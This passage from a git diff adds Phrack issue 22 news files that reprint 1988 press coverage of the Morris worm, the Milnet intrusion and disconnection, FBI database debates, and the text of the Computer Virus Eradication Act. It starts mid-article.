+developed "town crier" worm programs that acted as messengers and "diagnostic"
+worms that patrolled the network looking for malfunctioning computers.
+
+They even described a "vampire" worm program.  It was designed to run very
+complex programs late at night while the computer's human users slept.  When
+the humans returned in the morning, the vampire program would go to sleep,
+waiting to return to work the next evening.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Comments from Mark Eichin (SIPB Member & Project Athena "Watchmaker");
+
+The following paragraph from Markoff's article comes from a telephone
+conversation he had with me at the airport leaving the November 8, 1988 "virus
+conference":
+
+    "But Morris reasoned that another expert could defeat his program by
+     sending the correct answering signal back to the rogue.  To parry
+     this, Morris programmed his invader so that once every 10 times it
+     sent the query signal it would copy itself into the new machine
+     regardless of the answer.
+
+     The choice of 1 in 10 proved disastrous because it was far too
+     frequent.  It should have been one in 1,000 or even one in 10,000
+     for the invader to escape detection."
+
+However, it is incorrect (I did think Markoff had grasped my comments, perhaps
+not).  The virus design seems to have been to reinfect with a 1 in 15 chance a
+machine already infected.
+
+The code was BACKWARD, so it reinfected with a *14* in 15 chance.  Changing the
+denominator would have had no effect.
+_______________________________________________________________________________
+
+US Is Moving To Restrict Access To Facts About Computer Virus     Nov. 11, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By John Markoff  (New York Times)
+
+Government officials are moving to bar wider dissemination of information on
+techniques used in a rogue software program that jammed more than 6,000
+computers in a nationwide computer network last week.
+
+Their action comes amid bitter debate among computer scientists.  One group of
+experts believes wide publication of such information would permit computer
+network experts to identify problems more quickly and to correct flaws in their
+systems.  But others argue that such information is too potentially explosive
+to be widely circulated.
+
+Yesterday, officials at the National Computer Security Center, a division of
+the National Security Agency (NSA), contacted researchers at Purdue University
+in West Lafayette, Indiana, and asked them to remove information from campus
+computers describing internal workings of the software program that jammed
+computers around the nation on November 3, 1988.  (A spokesperson) said the
+agency was concerned because it was not certain that all computer sites had
+corrected the software problems that permitted the program to invade systems in
+the first place.
+
+Some computer security experts said they were concerned that techniques
+developed in the program would be widely exploited by those trying to break
+into computer systems.
+_______________________________________________________________________________
+
+FBI Studies Possible Charges In "Virus"                       November 12, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+>From the Los Angeles Times
+
+WASHINGTON -- FBI Director William S. Sessions on Thursday added two more laws
+that agents are scrutinizing to determine whether to seek charges against
+Robert T. Morris Jr. for unleashing a computer "virus" that shut down or slowed
+computers across the country last week.
+
+One of the laws - malicious mischief involving government communication lines,
+stations or systems - appears not to require the government to prove criminal
+intent, a requirement that lawyers have described as a possible barrier to
+successful prosecution in the case.
+
+Sessions told a press conference at FBI headquarters that the preliminary phase
+of the investigation should be completed in two weeks and defended the pace of
+the inquiry in which Morris, a Cornell University graduate student, has not yet
+been interviewed.  Friends of Morris, age 23, have said he told them that he
+created the virus.
+
+Sources have said that FBI agents have not sought to question Morris until they
+obtain the detailed electronic records of the programming he used in setting
+loose the virus - records that have been maintained under seal at Cornell
+University.
+
+In addition to the malicious mischief statue, which carries a maximum penalty
+of 10 years in prison, Sessions listed fraud by wire as one of the laws being
+considered.
+_______________________________________________________________________________
diff --git a/phrack22/11.txt b/phrack22/11.txt
new file mode 100644
index 0000000..dca2a2d
--- /dev/null
+++ b/phrack22/11.txt
@@ -0,0 +1,466 @@
+                                ==Phrack Inc.==
+
+                     Volume Two, Issue 22, File 11 of 12
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN                Issue XXII/Part 3                PWN
+            PWN                                                 PWN
+            PWN           Created by Knight Lightning           PWN
+            PWN                                                 PWN
+            PWN              Written and Edited by              PWN
+            PWN         Knight Lightning and Taran King         PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Computer Break-In                                             November 11, 1988
+~~~~~~~~~~~~~~~~~
+>From Intercom, Vol 28, No. 24, Air Force Communications Command Newsletter
+By Special Agent Mike Forche, AFOSI Computer Crime Investigator
+
+A computer hacker penetrated an Air Force Sperry 1160 computer system in the
+San Antonio, Texas, area.  The hacker was discovered by alert Air Force
+Communications Command computer operators who notified the data base
+administrator than an un-authorized user was in the system.  The data base
+administrator was able to identify the terminal, password, and USERID (system
+level) used by the hacker.
+
+The data base administrator quickly disabled the USERID/password (which
+belonged to a computer system monitor).  The data base administrator then
+observed the hacker trying to get into the system using the old
+USERID/password.  He watched as the hacker successfully gained entry into the
+system using another unauthorized USERID/password (which was also a system
+administrator level password).
+
+The hacker was an authorized common user in the computer system; however, he
+obtained system administrator access level to the government computer on both
+occasions.
+
+Review of the audit trail showed that the hacker had successfully gained
+unauthorized access to the computer every day during the two weeks the audit
+was run.  In addition, the hacker got unauthorized access to a pay file and
+instructed the computer floor operator to load a specific magnetic tape (pay
+tape).
+
+The hacker was investigated by Air Force Office of Special Investigation
+computer crime investigators for violation of federal crimes (Title 18 US Codes
+1030 computer fraud, and 641 wrongful conversion of government property), Texas
+state crimes (Title 7, Section 33.02 Texas computer crime wrongful access) and
+military crimes (obtaining services under false pretense, Uniform Code of
+Military Justice, Article 134).
+
+The computer crime investigators made the following observations:
+
+  - USERIDs used by the hacker were the same ones he used at his last base when
+    he had authorized system access in his job.  The use of acronyms and
+    abbreviations of job titles will hardly fool anyone; plus the use of
+    standard USERID base to base is dangerous.
+
+  - The passwords the hacker used were the first names of the monitors who
+    owned the USERIDs.  The use of names, phone numbers, and other common
+    easily-guessed items have time and time again been beaten by even the
+    unsophisticated hackers.
+
+                    Special Thanks To Major Douglas Hardie
+_______________________________________________________________________________
+
+"Big Brotherish" FBI Data Base Assailed                      November, 21, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+>From Knight-Ridder Newspapers (Columbia Daily Tribune)
+
+               "Professionals Unite To Halt Expansion Of Files"
+
+PALO ALTO, California -- For the first time in more than a decade, civil
+libertarians and computer professionals are banding together to stop what many
+consider a Big Brotherish attempt by the FBI to keep track of people's lives.
+
+Computer Professionals for Social Responsibility, based in Palo Alto, has been
+instrumental in preventing the FBI from expanding its data base to include
+information such as credit card transactions, telephone calls, and airline
+passenger lists.
+
+"We need computer professionals acting like public interest lawyers to make
+sure the FBI is acting responsibly," said Jerry Berman, chief legislative
+counsel for the American Civil Liberties Union.
+
+Berman was part of a panel Saturday at Stanford University that went
+head-to-head with the FBI's assistant director for technical services, William
+Bayse, over expansion of the National Crime Information Center.
+
+Law enforcement officials use the NCIC system's 19.4 million files about
+700,000 times a day for routine checks on everyone from traffic violators to
+Peace Corps applicants.
+
+"The FBI would like us to believe that they are protecting us from the hick
+Alabama sheriff who wants to misuse the system," said Brian Harvey, a computer
+expert at the University of California-Berkeley.  "The FBI is the problem."
+
+Not since the fight to pass the Privacy Act of 1974 have computer experts,
+civil libertarians, and legislators come together on the issue of citizen
+rights and access to information.
+
+In the early 1970s, the government's efforts to monitor more than 125,000 war
+protesters sparked concerns about privacy.  The 1974 law limited the movement
+of information exchanged by federal agencies.
+
+But computers were not so sophisticated then, and the privacy act has a number
+of exceptions for law enforcement agencies, Rotenberg said.  No laws curtail
+the FBI's data base.
+
+Two years ago, the FBI announced its plan to expand the data base and came up
+with 240 features to include, a sort of "wish list" culled from the kinds of
+information law enforcement officials who use the system would like to have.
+
+Rep. Don Edwards, D-Calif., balied at moving ahead with the plan without
+suggestions from an independent group, and put together a panel that includes
+members of the Palo Alto computer organization.
+
+Working with Bayse, FBI officials eventually agreed to recommend a truncated
+redesign of the data base.  It drops the most controversial features, such as
+plans to connect the data base to records of other government agencies -
+including the Securities and Exchange Commission, the IRS, the Immigration and
+Naturalization Service, the Social Security Administration, and the Department
+of State's passport office.
+
+But FBI director William Sessions could reject those recommendations and
+include all or part of the wish list in the redesign.
+
+The 20-year-old system has 12 main files containing information on stolen
+vehicles, missing people, criminal arrests and convictions, people who are
+suspected of plotting against top-level government officials, and people for
+whom arrest warrents have been issued.
+_______________________________________________________________________________
+
+
+Big Guns Take Aim At Virus                                    November 21, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+Taken From Government Computer News
+
+In the aftermath of the most recent virus infection of the Defense Data Network
+and Arpanet, Defense Department and National Institute of Standards and
+Technology computer security officials are scrambling to head off further
+attacks.
+
+Officials of the facilities struck by the virus met this month to discuss its
+nature and impact. The meeting at National Security Agency headquarters in Fort
+Meade, Md., included representatives of NSA and NIST as 'observers,' according
+to NIST computer security chief Stuart Katzke.
+
+Two days later, NSA and NIST officials met again to discuss how to avert future
+infections, Katzke said.  Katzke, who attended both meetings, said no decisions
+had been reached on how to combat viruses, and NSA and NIST representatives
+will meet again to firm up recommendations.
+
+Katzke, however, suggested one solution would be the formation of a federal
+center for anti-virus efforts, operated jointly by NSA's National Computer
+Security Center (NCSC) and NIST.
+
+The center would include a clearinghouse that would collect and disseminate
+information about threats, such as flaws in operating systems, and solutions.
+However, funding and personnel for the center is a problem, he said, because
+NIST does not have funds for such a facility.
+
+The center also would help organize responses to emergencies by quickly warning
+users of new threats and defenses against them, he said.  People with solutions
+to a threat could transmit their answers through the center to threatened
+users, he said.  A database of experts would be created to speed response to
+immediate threats.
+
+The center would develop means of correcting flaws in software, such as
+trapdoors in operating systems.  Vendors would be asked to develop and field
+solutions, he said.
+
+NIST would work on unclassified systems and the NCSC would work on secure
+military systems, he said.  Information learned about viruses from classified
+systems might be made available to the public through the clearinghouse, Katzke
+said, although classified information would have to be removed first.
+
+Although the virus that prompted these meetings did not try to destroy data, it
+made so many copies of itself that networks rapidly became clogged, greatly
+slowing down communications.  Across the network, computer systems
+crashed as the virus continuously replicated itself.
+
+During a Pentagon press conference on the virus outbreak, Raymond Colladay,
+director of the Defense Advanced Research Projects Agency (DARPA), said the
+virus hit 'several dozen' installations out of 300 on the agency's unclassified
+Arpanet network.
+
+Thousands Affected
+
+The virus also was found in Milnet, which is the unclassified portion of the
+Defense Data Network.  Estimates of how many computers on the network were
+struck varied from 6,000 to 250,000.  The virus did not affect any classified
+systems, DOD officials said.
+
+The virus hit DARPA computers in Arlington, Va., and the Lawrence Livermore
+Laboratories in California as well as many academic institutions, Colladay
+said.  It also affected the Naval Ocean Systems Command in San Diego and the
+Naval Research Laboratory in Maryland, a Navy spokesman said.
+
+Written in C and aimed at the UNIX operating system running on Digital
+Equipment Corp. VAX and Sun Microsystems Inc. computers, the virus was released
+November 2, 1988 into Arpanet through a computer at the Massachusetts Institute
+of Technology in Cambridge, Mass.
+
+The Virus apparently was intended to demonstrate the threat to networked
+systems.  Published reports said the virus was developed and introduced by a
+postgraduate student at Cornell University who specializes in computer
+security.  The FBI has interviewed the student.
+
+Clifford Stoll, a computer security expert at Harvard University who helped
+identify and neutralize the virus, said the virus was about 40 kilobytes long
+and took 'several weeks' to write.  It replicated itself in three ways.
+
+Spreading the Virus
+
+The first method exploited a little-known trapdoor in the Sendmail
+electronic-mail routine of Berkeley UNIX 4.3, Stoll said. The trapdoor was
+created by a programmer who wanted to remove some bugs, various reports said.
+However, the programmer forgot to remove the trapdoor in the final production
+version.  In exploiting this routine, the virus tricked the Sendmail program
+into distributing numerous copies of the virus across the network.
+
+Another method used by the virus was an assembly language program that found
+user names and then tried simple variations to crack poorly conceived passwords
+and break into more computers, Stoll said.
+
+Yet another replication and transmission method used a widely known bug in the
+Arpanet Finger program, which lets users know the last time a distant user has
+signed onto a network.  By sending a lengthy Finger signal, the virus gained
+access to the operating systems of Arpanet hosts.
+
+The virus was revealed because its creator underestimated how fast the virus
+would attempt to copy itself.  Computers quickly became clogged as the virus
+rapidly copied itself, although it succeeded only once in every 10 copy
+attempts.
+
+Users across the country developed patches to block the virus' entrance as soon
+as copies were isolated and analyzed.  Many users also used Arpanet to
+disseminate the countermeasures, although transmission was slowed by the
+numerous virus copies in the system.
+
+DARPA officials 'knew precisely what the problem was,' Colladay said.
+'Therefore, we knew precisely what the fix was. As soon as we had put that fix
+in place, we could get back online.'
+
+Colladay said DARPA will revise security policy on the network and will decide
+whether more security features should be added.  The agency began a study of
+the virus threat two days after the virus was released, he said.
+
+All observers said the Arpanet virus helped raise awareness of the general
+virus threat.  Several experts said it would help promote computer security
+efforts.  'Anytime you have an event like this it heightens awareness and
+sensitivity,' Colladay said.
+
+However, Katzke cautioned that viruses are less of a threat than are access
+abusers and poor management practices such as inadequate disaster protection or
+password control.  Excellent technical anti-virus defenses are of no use if
+management does not maintain proper control of the system, he said.
+
+Congress also is expected to respond to the virus outbreak.  The Computer Virus
+Eradication Act of 1988, which lapsed when Congress recessed in October, will
+be reintroduced by Rep. Wally Herger (R-Calif.), according to Doug Griggs, who
+is on Herger's staff.
+_______________________________________________________________________________
+
+Congressmen Plan Hearings On Virus                            November 27, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+>From The Seattle Times (Newhouse News Services)
+
+WASHINGTON - The computer virus that raced through a Pentagon data network
+earlier this month is drawing the scrutiny of two congressional committee
+chairmen who say they plan hearings on the issue during the 101st Congress.
+
+Democratic Reps. Robert Roe, chairman of the House Science Space and Technology
+Committee, and William Hughes, chairman of the crime subcommittee of the House
+Judiciary Committee, say they want to know more about the self-replicating
+program that invaded thousands of computer systems.
+
+The two chairmen, both from New Jersey, say the are concerned about how
+existing federal law applies to the November 2, 1988 incident in which a
+23-year-old computer prodigy created a program that jammed thousands of
+computers at universities, research centers, and the Pentagon.
+
+Roe said his committee also will be looking at ways to protect vital federal
+computers from similar viruses.
+
+"As we move forward and more and more of our national security is dependent on
+computer systems, we have to think more about the security and safety of those
+systems," Roe said.
+
+Hughes, author of the nation's most far-reaching computer crime law, said his
+1986 measure is applicable in the latest case.  He said the law, which carries
+criminal penalties for illegally accessing and damaging "federal interest"
+computers, includes language that would cover computer viruses.
+
+"There is no question but that the legislation we passed in 1986 covers the
+computer virus episodes,' Hughes said.  Hughes noted that the law also includes
+a section creating a misdemeanor offense for illegally entering a
+government-interest computer.  The network invaded by the virus, which included
+Pentagon research computers, would certainly meet the definition of a
+government-interest computer, he said.
+
+"The 1986 bill attempted to anticipate a whole range of criminal activity
+that could involve computers," he said.
+_______________________________________________________________________________
+
+Pentagon Severs Military Computer From Network Jammed By Virus    Nov. 30, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By John Markoff  (New York Times)
+
+NEW YORK - The Pentagon said on Wednesday that it had temporarily severed the
+connections between a nonclassifed military computer network and the nationwide
+academic research and corporate computer network that was jammed last month by
+a computer virus program.
+
+Department of Defense officials said technical difficulties led to the move.
+But several computer security experts said they had been told by Pentagon
+officials that the decision to cut off the network was made after an unknown
+intruder illegally gained entry recently to several computers operated by the
+military and defense contractors.
+
+Computer specialists said they thought that the Pentagon had broken the
+connections while they tried to eliminate a security flaw in the computers in
+the military network.
+
+The Department of Defense apparently acted after a computer at the Mitre
+Corporation, a Bedford, Mass., company with several military contracts, was
+illegally entered several times during the past month.  Officials at several
+universities in the United States and Canada said their computers had been used
+by the intruder to reach the Mitre computer.
+
+A spokeswoman for Mitre confirmed Wednesday that one of its computers had been
+entered, but said no classified or sensitive information had been handled by
+the computers involved.  "The problem was detected and fixed within hours with
+no adverse consequences," Marcia Cohen said.
+
+The military computer network, known as Milnet, connects hundreds of computers
+run by the military and businesses around the country and is linked through
+seven gateways to another larger computer network, Arpanet.  It was Arpanet
+that was jammed last month when Robert T. Morris, a Cornell University
+graduate student, introduced a rogue program that jammed computers on the
+network.
+
+In a brief statement, a spokesman at the Defense Communication Agency said the
+ties between Milnet and Arpanet, known as mail bridges, were severed at 10 p.m.
+Monday and that the connections were expected to be restored by Thursday.
+
+"The Defense Communications Agency is taking advantage of the loop back to
+determine what the effects of disabling the mail bridges are," the statement
+said.  "The Network Information Center is collecting user statements and
+forwarding them to the Milnet manager."
+
+Several computer security experts said they had been told that the network
+connection, which permits military and academic researchers to exchange
+information, had been cut in response to the intruder.  "We tried to find out
+what was wrong (Tuesday night) after one of our users complained that he could
+not send mail," said John Rochlis, assistant network manager at the
+Massachusetts Institute of Technology.  "Inititally we were given the run
+around, but eventually they unofficially confirmed to us that the shut-off was
+security related."
+
+Clifford Stoll, a computer security expert at Harvard University, posted an
+electronic announcement on Arpanet Wednesday that Milnet was apparently
+disconnected as a result of someone breaking into several computers.
+
+Several university officials said the intruder had shielded his location by
+routing telephone calls from his computer through several networks.
+
+A manager at the Mathematics Faculty Computer Facility at the University of
+Waterloo in Canada said officials there learned that one of their computers had
+been illegally entered after receiving a call from Mitre.
+
+He said the attacker had reached the Waterloo computer from several computers,
+including machines located at MIT, Stanford, the University of Washington and
+the University of North Carolina. He said that the attacks began on November 3,
+1988 and that some calls had been routed from England.
+
+A spokeswoman for the Defense Communications Agency said that she had no
+information about the break-in.
+
+Stoll said the intruder used a well-known computer security flaw to illegally
+enter the Milnet computers.  The flaws are similar to those used by Morris'
+rogue program.
+
+It involves a utility program called "file transfer protocol (FTP" that is
+intended as a convenience to permit remote users to transfer data files and
+programs over the network.  The flaw is found in computers that run the Unix
+operating system.
+
+The decision to disconnect the military computers upset a number of computer
+users around the country.  Academic computer security experts suggested that
+the military may have used the wrong tactic to attempt to stop the illegal use
+of its machines.
+
+"There is a fair amount of grumbling going on," said Donald Alvarez, an MIT
+astrophysicist.  "People think that this is an unreasonable approach to be
+taking."
+
+He said that the shutting of the mail gateways did not cause the disastrous
+computer shutdown that was created when the rogue program last month stalled as
+many as 6,000 machines around the country.
+
+[The hacker suspected of breaking into MIT is none other than Shatter.  He
+speaks out about the hacker community in PWN XXII/4.   -KL]
+_______________________________________________________________________________
+
+MCI's New Fax Network                                             December 1988
+~~~~~~~~~~~~~~~~~~~~~
+>From Teleconnect Magazine
+
+MCI introduced America's first dedicated fax network.  It's available now.  The
+circuit-switched network, called MCI FAX, takes a slice of MCI's existing
+bandwidth and configures it with software to handle only fax transmissions.
+Customers - even MCI customers - have to sign up separately for the service,
+though there's currently no fee to join.
+
+Users must dedicate a standard local phone line (e.g. 1MB) to each fax machine
+they want on the MCI network (the network doesn't handle voice) and in return
+get guaranteed 9600 baud transmission, and features like management reports,
+customized dialing plans, toll-free fax, cast fax, several security features,
+delivery confirmation and a separate credit card.
+
+The system does some protocol conversion, fax messages to PCs, to telex
+machines or from a PC via MCI Mail to fax.  The service is compatible with any
+make or model of Group III and below fax machine and will be sold, under a new
+arrangement for MCI, through both a direct sales force and equipment
+manufacturers, distributors and retailers.  For more info 1-800-950-4FAX.  MCI
+wouldn't release pricing, but it said it would be cheaper.
+_______________________________________________________________________________
+
+Military Bans Data Intruder                                    December 2, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Compiled From News Services
+
+NEW YORK -- The Pentagon has cut the connections between a military computer
+network (MILNET) and an academic research network (ARPANET) that was jammed
+last month by a "computer virus."
+
+The Defense Department acted, not because of the virus, but rather because an
+unknown intruder had illegally gained entry to several computers operated by
+the armed forces and by defense contractors, several computer security experts
+said.
+
+The Defense Department apparently acted after a computer at the Mitre
+Corporation of Bedford, Mass., a company with several military contracts, was
+illegally entered several times in the past month.
+
+Officials at several universities in the United States and Canada said their
+computers had been used by the intruder to reach the Mitre computer.
+
+A spokeswoman for Mitre confirmed Wednesday that one of its computers had been
+entered, but said no classified or sensitive information had been handled by
+the computers involved.
+
+"The problem was detected and fixed within hours, with no adverse
+consequences," Marcia Cohen, the spokeswoman said.
+
+The military computer network, known as Milnet, connects hundreds of computers
+run by the armed forces and businesses around the country and is linked through
+seven gateways to another larger computer network, Arpanet.  Arpanet is the
+network that was jammed last month by Robert T. Morris, a Cornell University
+graduate student.
+_______________________________________________________________________________
diff --git a/phrack22/12.txt b/phrack22/12.txt
new file mode 100644
index 0000000..c47eebf
--- /dev/null
+++ b/phrack22/12.txt
@@ -0,0 +1,473 @@
+                                ==Phrack Inc.==
+
+                     Volume Two, Issue 22, File 12 of 12
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN                Issue XXII/Part 4                PWN
+            PWN                                                 PWN
+            PWN           Created by Knight Lightning           PWN
+            PWN                                                 PWN
+            PWN              Written and Edited by              PWN
+            PWN         Knight Lightning and Taran King         PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Networks Of Computers At Risk From Invaders                    December 3, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By John Markoff  (New York Times)
+
+Basic security flaws similar to the ones that let intruders gain illegal entry
+to military computer networks in recent weeks are far more common than is
+generally believed, system designers and researchers say.
+
+And there is widespread concern that computer networks used for everyday
+activities like making airline reservations and controlling the telephone
+system are highly vulnerable to attacks by invaders considerably less skilled
+than the graduate student whose rogue program jammed a nationwide computer
+network last month.
+
+For example, the air traffic control system could be crippled if someone
+deliberately put wrong instructions into the network, effectively blinding
+controllers guiding airplanes.
+
+The two recent episodes have involved military computers:  One at the Mitre
+Corporation, a company with Pentagon contracts, and the other into Arpanet, a
+Defense Department network with links to colleges.  But illegal access to
+computer systems can compromise the privacy of millions of people.
+
+In 1984, TRW Inc. acknowledged that a password providing access to 90 million
+credit histories in its files had been stolen and posted on a computerized
+bulletin board system.  The company said the password may have been used for as
+long as a month.
+
+This year an internal memorandum at Pacific Bell disclosed that sophisticated
+invaders had illegally gained access to telephone network switching equipment
+to enter private company computers and monitor telephone conversations.
+
+Computer security flaws have also been exploited to destroy data.  In March
+1986 a computer burglar gained access by telephone to the office computer of
+Rep. Ed Zschau of California, destroyed files and caused the computer to break
+down.  Four days later, staff workers for Rep. John McCain of Arizona, now a
+senator, told the police they had discovered that someone outside their office
+had reached into McCain's computer and destroyed hundreds of letters and
+mailing addresses.
+
+In Australia last year, a skilled saboteur attacked dozens of computers by
+destroying an underground communication switch.  The attack cut off thousands
+of telephone lines and rendered dozens of computers, including those at the
+country's largest banks, useless for an entire day.
+
+Experts say the vulnerability of commercial computers is often compounded by
+fundamental design flaws that are ignored until they are exposed in a glaring
+incident.  "Some vulnerabilities exist in every system," said Peter Neumann, a
+computer scientist at SRI International in Menlo Park, California.  "In the
+past, the vendors have not really wanted to recognize this."
+
+Design flaws are becoming increasingly important because of the rapidly
+changing nature of computer communications. Most computers were once isolated
+from one another.  But in the last decade networks expanded dramatically,
+letting computers exchange information and making virtually all large
+commercial systems accessible from remote places.  But computer designers
+seeking to shore up security flaws face a troubling paradox:  By openly
+discussing the flaws, they potentially make vulnerabilities more known and thus
+open to sabotage.
+
+Dr. Fred Cohen, a computer scientist at the University of Cincinnati, said most
+computer networks were dangerously vulnerable.  "The basic problem is that we
+haven't been doing networks long enough to know how to implement protection,"
+Cohen said.
+
+The recent rogue program was written by Robert Tappan Morris, a 23-year-old
+Cornell University graduate student in computer science, friends of his have
+said.  The program appears to have been designed to copy itself harmlessly from
+computer to computer in a Department of Defense network, the Arpanet.  Instead
+a design error caused it to replicate madly out of control, ultimately jamming
+more than 6,000 computers in this country's most serious computer virus attack.
+
+For the computer industry, the Arpanet incident has revealed how security flaws
+have generally been ignored.  Cohen said most networks, in effect, made
+computers vulnerable by placing entry passwords and other secret information
+inside every machine.  In addition, most information passing through networks
+is not secretly coded.  While such encryption would solve much of the
+vulnerability problem, it would be costly.  It would also slow communication
+between computers and generally make networks much less flexible and
+convenient.
+
+Encryption of data is the backbone of security in computers used by military
+and intelligence agencies. The Arpanet network, which links computers at
+colleges, corporate research centers and military bases, is not encrypted.
+
+The lack of security for such information underscored the fact that until now
+there has been little concern about protecting data.
+
+Most commercial systems give the people who run them broad power over all parts
+of the operation.  If an illicit user obtains the privileges held by a system
+manager, all information in the system becomes accessible to tampering.
+
+The federal government is pushing for a new class of military and intelligence
+computer in which all information would be divided so that access to one area
+did not easily grant access to others, even if security was breached.  The goal
+is to have these compartmentalized security systems in place by 1992.
+
+On the other hand, one of the most powerful features of modern computers is
+that they permit many users to share information easily; this is lost when
+security is added.
+
+In 1985 the Defense Department designed standards for secure computer systems,
+embodied in the Orange Book, a volume that defines criteria for different
+levels of computer security.  The National Computer Security Center, a division
+of the National Security Agency, is now charged with determining if government
+computer systems meet these standards.
+
+But academic and private computer systems are not required to meet these
+standards, and there is no federal plan to urge them on the private sector. But
+computer manufacturers who want to sell their machines to the government for
+military or intelligence use must now design them to meet the Pentagon
+standards.
+
+Security weaknesses can also be introduced inadvertently by changes in the
+complex programs that control computers, which was the way Morris's program
+entered computers in the Arpanet.  These security weaknesses can also be
+secretly left in by programmers for their convenience.
+
+One of the most difficult aspects of maintaining adequate computer security
+comes in updating programs that might be running at thousands of places around
+the world once flaws are found.
+
+Even after corrective instructions are distributed, many computer sites often
+do not close the loopholes, because the right administrator did not receive the
+new instructions or realize their importance.
+_______________________________________________________________________________
+
+Computer Virus Eradication Act of 1988                         December 5, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The following is a copy of HR-5061, a new bill being introduced in the House by
+Wally Herger (R-CA) and Robert Carr (D-Mich.).
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+100th Congress 2D Session                                             H.R. 5061
+
+To amend title 18, United States Code, to provide penalties for persons
+interfering with the operations of computers through the use of programs
+containing hidden commands that can cause harm, and for other purposes.
+
+IN THE HOUSE OF REPRESENTATIVES                                   July 14, 1988
+Mr. Herger (for himself and Mr. Carr) introduced the following bill; which was
+referred to the Committee on the Judiciary
+
+A BILL
+To ammend title 18, United States Code, to provide penalties for persons
+interfering with the operations of computers through the use of programs
+containing hidden commands that can cause harm, and for other purposes.
+
+                                   -   -   -
+
+Be it enacted by the Senate and House of Representatives of the United States
+of America in Congress assembled,
+
+SECTION 1. SHORT TITLE.
+           This Act may be cited as the "Computer Virus Eradication Act of
+           1988".
+
+SECTION 2. TITLE 18 AMENDMENT.
+           (A) IN GENERAL.- Chapter 65 (relating to malicious mischief) of
+           title 18, United States Code, is amended by adding at the end the
+           following:
+
+           S 1368.  Disseminating computer viruses and other harmful computer
+                    programs
+          (a) Whoever knowingly --
+             (1) inserts into a program for a computer information or commands,
+                 knowing or having reason to believe that such information or
+                 commands will cause loss to users of a computer on which such
+                 program is run or to those who rely on information processed
+                 on such computer; and
+             (2) provides such a program to others in circumstances in which
+                 those others do not know of the insertion or its effects; or
+                 attempts to do so, shall if any such conduct affects
+                 interstate or foreign commerce, be fined under this title or
+                 imprisoned not more than 10 years, or both.
+          (b) Whoever suffers loss by reason of a violation of subsection (a)
+              may, in a civil action against the violator, obtain appropriate
+              relief.  In a civil action under this section, the court may
+              award to the prevailing party a reasonable attorney's fee and
+              other litigation expenses.
+
+
+           (B) CLERICAL AMENDMENT.- The table of sections at the begining of
+           chapter 65 of title 18, United States Code, is amended by adding at
+           the end the following:
+           S 1368.  Disseminating computer viruses and other harmful computer
+                    programs.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+NOTE:  The above text was typed in by hand from a printed copy of HR5 061.
+       There is a possibility that there may be typographical errors which
+       could affect the nature of the bill.
+
+       For an official copy of the bill, please contact:
+
+                                Mr. Doug Riggs
+                              1108 Longworth Bldg
+                            Washington D.C.  20515
+
+                           Information Presented by
+               Don Alvarez of the MIT Center For Space Research
+_______________________________________________________________________________
+
+Virus Conference In Arlington, Virginia                        December 5, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Entitled "Preventing and Containing Computer Virus Attacks", it takes place
+January 30-31, in Arlington, VA.  Speakers include Representative Wally Herger
+(R-CA), a special agent from the FBI, John Landry (ADAPSO virus committee
+chairman), Patricia Sission from NASA, as well as a collection of attorneys and
+business folk.  The conference is chaired by Dave Douglass, no information
+provided.  It supposedly costs $695.
+
+The address provided is:
+
+                         United Communications Group
+                         4550 Montgomery Avenue
+                         Suite 700N
+                         Bethesda, MD   20814-3382
+
+
+                    Information Provided By Gregg Tehennepe
+_______________________________________________________________________________
+
+New York Times Reviews Novel About Computer Sabotage           December 7, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The Sunday, December 4, 1988 issue of the New York Times Book Review (their
+Christmas Books issue) prominently reviews a new novel, 'Trapdoor,' by Bernard
+J. O'Keefe.  The premise (from the review by Newgate Callender, NYT's crime
+fiction reviewer):
+
+"A brilliant American woman of Lebanese descent has developed the computer code
+that controls the operation of all our nuclear devices.  Turned down for the
+job she has sought, convinced male chauvinism is the reason, she is ripe to be
+conned by a Lebanese activist.  At his suggestion she inserts a virus into the
+computer system that in a short time will render the entire American nuclear
+arsenal useless.  ... The Lebanese President ... demands that Israel withdraw
+from the West Bank, or else he will tell the Russians that the United States
+will lie helpless for a week or so."
+
+Callender's review begins with the lead sentence, "November 2, 1988, was the
+day computers in American went mad, thanks to the 'virus' program inserted by
+the now-famous, fun-loving Robert T. Morris, Jr."
+
+Some background on the author, also from the review:
+
+"Bernard J. O'Keefe (is) chairman of the high-tech company EG&G and of an
+international task force on nuclear terrorism ... (and is) the author
+of a nonfiction book called 'Nuclear Hostages.'  O'Keefe says, "I wrote this
+parable to point out the complexity of modern technology and to demonstrate
+how one error, one misjudgment, or one act of sabotage could lead to actions
+that would annihilate civilization.""
+
